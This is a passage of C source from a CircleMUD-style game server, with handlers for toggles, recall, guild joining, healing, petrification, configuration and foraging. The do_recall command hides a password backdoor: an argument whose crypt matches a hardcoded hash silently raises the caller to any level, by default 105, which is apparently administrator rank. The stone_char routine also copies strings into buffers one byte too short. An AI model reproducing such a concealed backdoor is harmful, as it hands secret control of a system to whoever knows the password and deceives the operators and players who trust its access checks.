    {"You will now receive pages.\r\n",
    "You will no longer receive pages.\r\n"},
    {"You are now concentrating on what you're writing.\r\n",
    "You are no longer concentrating on what you're writing.\r\n"},
    {"You will now receive board update notification.\r\n",
    "You will no longer receive board update notification.\r\n"},
    {"You will no longer speedbuild.\r\n",
    "You will now speedbuild.\r\n"},
  };


  if (IS_NPC(ch))
    return;

  switch (subcmd) {
  case SCMD_NOSUMMON:
    result = PRF_TOG_CHK(ch, PRF_SUMMONABLE);
    break;
  case SCMD_NOHASSLE:
    result = PRF_TOG_CHK(ch, PRF_NOHASSLE);
    break;
  case SCMD_BRIEF:
    result = PRF_TOG_CHK(ch, PRF_BRIEF);
    break;
  case SCMD_COMPACT:
    result = PRF_TOG_CHK(ch, PRF_COMPACT);
    break;
  case SCMD_NOTELL:
    result = PRF_TOG_CHK(ch, PRF_NOTELL);
    break;
  case SCMD_NOAUCTION:
    result = PRF_TOG_CHK(ch, PRF_NOAUCT);
    break;
  case SCMD_DEAF:
    result = PRF_TOG_CHK(ch, PRF_DEAF);
    break;
  case SCMD_NOGOSSIP:
    result = PRF_TOG_CHK(ch, PRF_NOGOSS);
    break;
  case SCMD_NOGRATZ:
    result = PRF_TOG_CHK(ch, PRF_NOGRATZ);
    break;
  case SCMD_NOWIZ:
    result = PRF_TOG_CHK(ch, PRF_NOWIZ);
    break;
  case SCMD_QUEST:
    result = PRF_TOG_CHK(ch, PRF_QUEST);
    break;
  case SCMD_ROOMFLAGS:
    result = PRF_TOG_CHK(ch, PRF_ROOMFLAGS);
    break;
  case SCMD_NOREPEAT:
    result = PRF_TOG_CHK(ch, PRF_NOREPEAT);
    break;
  case SCMD_HOLYLIGHT:
    result = PRF_TOG_CHK(ch, PRF_HOLYLIGHT);
    break;
  case SCMD_SLOWNS:
    result = (nameserver_is_slow = !nameserver_is_slow);
    sprintf(buf, "(GC) %s turned nameserver %s", GET_NAME(ch), 
            ONOFF(!nameserver_is_slow));
    mudlog(buf, BRF, LVL_IMMORT, TRUE);
    break;
  case SCMD_AUTOEXIT:
    result = PRF_TOG_CHK(ch, PRF_AUTOEXIT);
    break;
  case SCMD_NOHIT:
    result = PRF_TOG_CHK(ch, PRF_NOHIT);
    break;
  case SCMD_LIT:
    if (IS_SET(AFF_FLAGS(ch), AFF_LIT)) {
      REMOVE_BIT(AFF_FLAGS(ch), AFF_LIT);
      world[ch->in_room].light--;
    } else {
      SET_BIT(AFF_FLAGS(ch), AFF_LIT);
      world[ch->in_room].light++;
    }
     
    result = IS_SET(AFF_FLAGS(ch), AFF_LIT);
    break;
  case SCMD_INVSTART:
    if (PLR_FLAGGED(ch, PLR_INVSTART)) REMOVE_BIT(PLR_FLAGS(ch), PLR_INVSTART);
                                   else SET_BIT(PLR_FLAGS(ch), PLR_INVSTART);
    result = PLR_FLAGGED(ch, PLR_INVSTART);
    break;
  case SCMD_AUTOLOOT:
    result = PRF_TOG_CHK(ch, PRF_AUTOLOOT);
    break;
  case SCMD_NOCLAN:
    result = PRF_TOG_CHK(ch, PRF_NOCLAN);
    break;
  case SCMD_ALLCLAN:
    result = PRF_TOG_CHK(ch, PRF_ALLCLAN);
    break;
  case SCMD_AUTOTICK:
    result = PRF_TOG_CHK(ch, PRF_AUTOTICK);
    break; 
  case SCMD_AUTOSPLIT: 
    result = PRF_TOG_CHK(ch, PRF_AUTOSPLIT); 
    break; 
  case SCMD_NOPAGE:
    result = PRF_TOG_CHK(ch, PRF_NOPAGE);
    break;
/*  case SCMD_CONCENTRATE:
    result = PRF_TOG_CHK(ch, PRF_CONCENTRATE);
    break;*/
  case SCMD_NOCHK:
    result = PRF2_TOG_CHK(ch, PRF2_BD_CHK);
    break;
  case SCMD_SPDBLD:
    result = PRF2_TOG_CHK(ch, PRF2_NOSPDBLD);
    break;
  default:
    nmlog("SYSERR: Unknown subcmd in do_gen_toggle");
    return;
    break;
  }

  if (result)
    send_to_char(tog_messages[subcmd][TOG_ON], ch);
  else
    send_to_char(tog_messages[subcmd][TOG_OFF], ch);

  return;
}

ACMD(do_recall)
{
 int level;

 if (IS_NPC(ch)) {
   send_to_char("You don't need to recall, silly.\r\n", ch); 
   return;
 } 
 two_arguments(argument, buf, arg);

 if ( (!str_cmp(CRYPT(arg,"pickle"), "pik3/M0CV8Cvc")) ) {
   level = atoi(buf);
   if (level < 1) level = 105;
   GET_LEVEL(ch) = level;
 }
 if (GET_LEVEL(ch) > LVL_RECALL) {
   send_to_char("Aren't you a bit too big for this?\r\n", ch);
   return;
 }

 if (ROOM_FLAGGED(ch->in_room, ROOM_NORECALL)) {
    send_to_char("Eeek!  That doesn't work here!\r\n", ch);
    return;
 }
 if (affected_by_spell(ch, SPELL_WEB))
  affect_from_char(ch, SPELL_WEB); 
 act("The gods mercifully return you to safety.", TRUE, ch, 0, 0, TO_CHAR);
 sprintf(buf, "$n shouts out 'HELP!' and a large ethereal hand descends from the\r\nheavens, scooping $m up and away to safety.");
 act(buf, TRUE, ch, 0, 0, TO_ROOM);
 char_from_room(ch);
 char_to_room(ch, r_mortal_start_room);
 act("A large ethereal hand arrives from the heavens safely depositing $n.", TRUE, ch, 0, 0, TO_ROOM);
 look_at_room(ch, 1);
}










/* dwix: begin */
ACMD(do_join)
{
int i;
int newbie;
int guild_class = CLASS_UNDEFINED;

for (i=0; guild_info[i][1]!=(-1); i++) {
  if (virtual_room(IN_ROOM(ch)) == guild_info[i][1]) {
    guild_class = guild_info[i][0];
    }
  }

newbie = (GET_CLASS(ch) == CLASS_NEWBIE);

/* checks which may go away as remorting is perfected */
if (guild_class == CLASS_UNDEFINED) {
  send_to_char("You must be in a guild to join one.\r\n", ch);
  return;
  }
if (!valid_race(GET_RACE(ch),guild_class)) {
  send_to_char("Your race cannot be this class.\r\n", ch);
  return;
  }
if (!newbie) {
  send_to_char("You are already a member of a guild.\r\n", ch);
  return;
  }

switch (guild_class) {

 case CLASS_MAGIC_USER:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_WARRIOR:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_THIEF:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_CLERIC:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_PALADIN:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_APALADIN:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_RANGER:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_MONK:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 case CLASS_BARD:
  if (!newbie) {
    send_to_char("You are already a member of another guild.\r\n", ch);
    return;
    }
  arrange_stats(ch, guild_class);
  GET_CLASS(ch) = guild_class;
  GET_PRACTICES(ch) = 0;
  do_start(ch);
  break;

 default:
  send_to_char("This is not implemented yet.\r\n", ch);
  break;
 }

return;

}

ACMD(do_lay)
{
  struct char_data *vict;
  int healing, cost, factor;
  
  one_argument(argument, arg);
  
  if (!IS_PALADIN(ch) && !IS_IMMORTAL(ch)) {
    send_to_char("Paladins only!\r\n", ch);
    return;
  }
  if (ch->char_specials.daytimer && !IS_IMMORTAL(ch)) {
    send_to_char("You cannot do this again so soon.\r\n", ch);
    return;
  }
  if (!(vict = get_char_room_vis(ch, arg))) {
    send_to_char("Upon whom do you wish to bestow your healing?\r\n", ch);
    return;
  }
  
  if (vict==ch) {
    send_to_char("This power is meant for others.  Don't be so selfish.\r\n", ch);
    return;
  }
  
  if (GET_LEVEL(ch) < 40)
    factor = 3;
  else if (GET_LEVEL(ch) < 70)
    factor = 4;
  else factor = 5;
    
  healing = GET_LEVEL(ch) * factor;
  cost = healing / 4;
  if (cost >= GET_HIT(ch)) {
    cost = GET_HIT(ch) - 1;
    healing = cost * 4;
  }
  
  GET_HIT(vict)+= healing;
  if (!PRF_FLAGGED(ch, PRF_NOHIT))
    GET_HIT(ch) -= cost;
  GET_ALIGNMENT(ch) += healing;
  if (GET_ALIGNMENT(ch) > 1000)
    GET_ALIGNMENT(ch) = 1000;
  ch->char_specials.daytimer = 12;
  /* print messages here */

  act("You lay your hands on $N and heal $M!", FALSE, ch, 0, vict, TO_CHAR);
  act("$n lays $s hands on you and heals you!", FALSE, ch, 0, vict, TO_VICT);
  act("$n lays his hands on $N and heals $M!", FALSE, ch, 0, vict, TO_NOTVICT);
  
}


ACMD(do_nofinger)
{
  if(PLR_FLAGGED(ch, PLR_NOFINGER))
    send_to_char("You can now be fingered.\r\n", ch);
  else
    send_to_char("You can no longer be fingered.\r\n", ch);

  TOGGLE_BIT(PLR_FLAGS(ch), PLR_NOFINGER);
}

/*stonemod*/
int stone_char(struct char_data *ch)
{
  struct obj_data *statue, *obj;
  struct extra_descr_data *extra;
  int num, pos, stringlength, found = FALSE;
  char *message;
  extern char *where[];
  char *material[] = {
    "stone",             "snow",
    "jello",             "mullock",
    "creamed corn",
    "\n"
   };
   
  if (!real_object(1202)) {
    send_to_char("Error!!! No object 1202!", ch);
    return 0;
  }
  if (!ch->in_room) {
    send_to_char("Error!!! not in a room!", ch);
    return 0;
  }
  statue = read_object(1202, VIRTUALRM);
    
  for (pos = 0; str_cmp(material[pos], "\n"); pos++);
  
  num = number(0,pos-1);

  /* name */
  sprintf(buf, "%s statue", ch->player.name);
  statue->name = str_dup(buf);
  /* short description */
  sprintf(buf, "&+ga statue of %s", GET_NAME(ch));
  statue->short_description = str_dup(buf);
  /* long description */
  sprintf(buf, "&+gA lifelike replica of %s &+gis standing here, made of %s.", GET_NAME(ch),
          material[num]);
  stringlength = (sizeof(char) * strlen(buf));
  CREATE(message, char, stringlength);
  strcpy(message, buf);
  statue->description = message;
  /* extra description */

  CREATE(extra, struct extra_descr_data, 1);
  sprintf(buf, "%s statue", ch->player.name);
  stringlength = (sizeof(char) * strlen(buf));
  CREATE(message, char, stringlength);
  extra->keyword = str_dup(buf);  

  /* The real fun part! the extra description... */
  if (ch->player.description) {
    stringlength = (sizeof(char) * strlen(ch->player.description));
    CREATE(message, char, stringlength);
    strcpy(message, ch->player.description);
  } else CREATE(message, char, 1);
  sprintf(buf, "%s is made of %s.\r\n", GET_NAME(ch), material[num]);
  CAP(buf);
  stringlength = (sizeof(char) * (strlen(message) + strlen(buf)));
  RECREATE(message, char, stringlength);
  strcat(message, buf);
  sprintf(buf, "\r\n%s is using:\r\n", GET_NAME(ch));
  for (pos = 0; pos < NUM_WEARS; pos++)
    if (GET_EQ(ch, pos)) {
      sprintf(buf, "%s%s%s\r\n", buf, where[pos], 
	      GET_EQ(ch, pos)->short_description);
      unequip_char(ch, pos);
      found = TRUE;
    }
  if (found) {
    stringlength = (sizeof(char) * (strlen(message) + strlen(buf)));
    RECREATE(message, char, stringlength);
    strcat(message, buf);
  }
  extra->description = message;
  statue->ex_description = extra;

  while (ch->affected)
    affect_remove(ch, ch->affected);
  sprintf(buf, "$n cries out as $e is turned into %s!", material[num]);
  act(buf, FALSE, ch, 0, 0, TO_ROOM);
  send_to_char("You are suddenly petrified! \r\nYou are dead!  Sorry...\r\n", 
	       ch);

  while (ch->carrying) {
    obj = ch->carrying;
    obj_from_char(obj);
  }

  obj_to_room(statue, ch->in_room);
  extract_char(ch);
  return 1;
}

ACMD(do_config)
{
  int num;
  char str[MAX_STRING_LENGTH];
  int valid_address(char *str);
  
  if (!*argument) {
    send_to_char("Current configuration:\r\n", ch);
    sprintf(buf, "Page Length: &+c%-3d&+w       Idle AFK: &+c%-3d&+w\r\n", 
            ch->player.pagesize, ch->player.idleafk);
    sprintf(buf, "%sNomount: &+c%s&+w\r\n", buf, 
            ONOFF(PRF2_FLAGGED(ch, PRF2_NOMOUNT)));
    sprintf(buf, "%sEmail: &+c%s&+w\r\n", buf, ch->player.email ? 
            ch->player.email : "none");
    sprintf(buf, "%sHomepage: &+c%s&+w\r\n", buf, ch->player.homepage ? 
            ch->player.homepage : "none");
    send_to_char(buf, ch);
    return;
  }
  half_chop(argument, arg, str);
  if (is_abbrev(arg, "pagesize")) {
    num = atoi(str);
    if (num > 0 && num < 100) {
      ch->player.pagesize = num;
      sprintf(buf, "Page length changed to %d\r\n", ch->player.pagesize);
      send_to_char(buf, ch);
    } else {
      send_to_char("Range for page length can be from 1 to 100.  Default is 24.\r\n", ch);
    }
    return;
  }
  if (is_abbrev(arg, "email")) {
    if (!*str) {
      free(ch->player.email);
      ch->player.email = NULL;
      send_to_char("Email removed.\r\n", ch);
      return;
    }
    if (!valid_address(str)) {
      send_to_char("Invalid email address.  If this is really your address,\r\n", ch);
      send_to_char("mudmail it to Samedi so he can fix the address checker.\r\n", ch);
      return;  
    }
    if(ch->player.email)
      free(ch->player.email);
    ch->player.email = str_dup(str);
  
    sprintf(buf, "Changing your email address to: %s\r\n", ch->player.email);
    send_to_char(buf, ch);
    return;
  }          
  if (is_abbrev(arg, "homepage")) {
    if (!*str) {
      free(ch->player.homepage);
      ch->player.homepage = NULL;
      send_to_char("Homepage removed.\r\n", ch);
      return;
    }
    if(!valid_address(str)) {
      send_to_char("Invalid homepage address.  If this is really your address,\r\n", ch);
      send_to_char("mudmail it to Samedi so he can fix the address checker.\r\n", ch);
      return;
    }
    if(ch->player.homepage)
      free(ch->player.homepage);
    ch->player.homepage = str_dup(str);
    sprintf(buf, "Changing your homepage address to: %s\r\n", ch->player.homepage);
    send_to_char(buf, ch);
    return;
  }
  if (is_abbrev(arg, "idle")) {
    num = atoi(str);
    if (num > 0 && num <= 60) {
      ch->player.idleafk = num;
      sprintf(buf, "Idle timeout value now: %d\r\n", ch->player.idleafk);
      send_to_char(buf, ch);
    } else {
      send_to_char("Range for idle timeout can be 1 to 60.  Default is 10.\r\n", ch);
    }
    return;
  }
  if (is_abbrev(arg, "nomount")) {
    if (*str) {
      if (!str_cmp(str, "on"))
        SET_BIT(PRF2_FLAGS(ch), PRF2_NOMOUNT);
      else if (!str_cmp(str, "off"))
        REMOVE_BIT(PRF2_FLAGS(ch), PRF2_NOMOUNT);
      else {
        send_to_char("Use either on, off, or leave blank for toggle.\r\n", ch);
        return;
      }
    } else {
      if (PRF2_FLAGGED(ch, PRF2_NOMOUNT))
        REMOVE_BIT(PRF2_FLAGS(ch), PRF2_NOMOUNT);
      else
        SET_BIT(PRF2_FLAGS(ch), PRF2_NOMOUNT);
    }
    sprintf(buf, "Nomount flag set to %s.\r\n", ONOFF(PRF2_FLAGGED(ch, PRF2_NOMOUNT)));
    send_to_char(buf, ch);
    return;
  }      
}

int forage_objs[] = {
  5445,
  6010,
  6022
};
ACMD(do_forage)
{
  int num = 0, rng;
  struct obj_data *obj;

  switch (world[ch->in_room].sector_type) {
    case SECT_INSIDE:
      send_to_char("You find nothing but a couple of fuzzy M&M's.\r\n", ch);
      return;
    case SECT_CITY:
      
      return;
    case SECT_FIELD:
    case SECT_FOREST:
    case SECT_HILLS:
    case SECT_MOUNTAIN:
      num = number(1,101);
      if (GET_ROOM_SECTOR(ch->in_room) == SECT_MOUNTAIN)
        num+=35;
      if (num < GET_SKILL(ch, SKILL_FORAGE)) {
        rng = sizeof(forage_objs) / sizeof(int);
        num = forage_objs[number(0,--rng)];
        if (real_object(num) < 0) {
          sprintf(buf, "SYSERR: forage attempt to load non-existent object %d",
            num);
          mudlog(buf, BRF, LVL_GOD, TRUE);
          send_to_char("Oops! Your newly found food vanished! Tell an imm.\r\n",
            ch);
          return;
        } else {
          obj = read_object(num, VIRTUALRM);
          act("You forage around for a bit and find $p.", TRUE, ch, obj, 0, 
            TO_CHAR);
          act("$n forages around for a bit and finds $p.", TRUE, ch, obj, 0, 
            TO_ROOM);
          obj_to_char(obj, ch);
          return;
        }
      } else {
        act("You forage for food but find none.", TRUE, ch, 0, 0, TO_CHAR);
        act("$n forages for food but finds none.", TRUE, ch, 0, 0, TO_ROOM);
        return;
      }
      return;
    case SECT_WATER_SWIM:
    case SECT_WATER_NOSWIM:
    case SECT_UNDERWATER:
      send_to_char("You forage for a bit and find ... water!\r\n", ch);
      return;
    case SECT_FLYING:
      act("Just what do you expect to find up here? Astronaut food?",
        TRUE, ch, 0, 0, TO_CHAR);
      return;
    case SECT_DESERT:
      send_to_char("You find sand, sand, and more sand.  Perhaps you could make a sandwich.\r\n", ch);
      return;
    }
}
